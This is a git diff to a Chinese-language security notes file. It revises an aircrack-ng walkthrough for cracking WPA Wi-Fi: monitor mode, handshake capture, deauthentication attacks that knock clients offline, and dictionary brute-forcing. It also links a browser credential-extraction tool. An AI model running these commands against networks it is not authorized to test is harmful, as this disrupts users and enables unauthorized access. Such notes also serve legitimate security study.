--- a/网络安全.md
+++ b/网络安全.md
@@ -95,23 +95,23 @@ sudo -i   # 用管理员权限
 ifconfig  # 查看当前网卡 Interface = wlan0 || wlan0mon
 airmon-ng              # 检查网卡是否支持监听
 airmon-ng start wlan0  # 激活无线网卡监听模式 NetworkManager + wpa_supplicant
-airodump-ng wlan0      # 扫描周边WiFi信号 + 停止命令Ctrl+C
+airodump-ng wlan0mon   # 扫描周边WiFi信号 + 停止命令Ctrl+C
 
 # 被动等待抓包命令 # 保持抓包窗口一直开着 + 停止命令Ctrl+C
-airodump-ng -c 11 –bssid *:*:*:*:*:* -w /home/kali/桌面/handshake wlan0
-   # airodump参数: -c “CH频段” –bssid “MAC地址”
+airodump-ng --bssid *:*:*:*:*:* --channel 9 --write ./handshake wlan0mon
+   # airodump参数: --bssid “MAC地址”  --channel -c “CH频段”
    # airodump输出: “bssid无线网卡MAC地址” + “STATION客户端”
 
 # 主动ACK循环攻击 # 等一会儿上面窗口中出现握手包: WPA handshake: ******** # 然后停止抓包
-aireplay-ng -0 10 -a *:*:*:*:*:* -c *:* wlan0
-   # aireplay参数: -0 “通知设备断开的攻击次数10” -a “bssid地址” -c “下线STATION客户端”
+aireplay-ng -a *:*:*:*:*:* -c *:* -0 10 wlan0mon
+   # aireplay参数: -a “bssid地址” -c “下线STATION客户端” -0 “通知设备断开并攻击10次”
 
 # 暴力破解密码
-aircrack-ng -b *:*:*:*:*:* -w /home/kali/桌面/password.txt /home/kali/桌面/handshake*.cap
+aircrack-ng -b *:*:*:*:*:* -w ./password.txt ./handshake*.cap
    # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
 
 # 停止无线网卡监听模式
-airmon-ng stop wlan0 # wlan0mon
+airmon-ng stop wlan0mon
 ~~~
 * [浏览器数据解密](https://github.com/angenalZZZ/HackBrowserData)
 
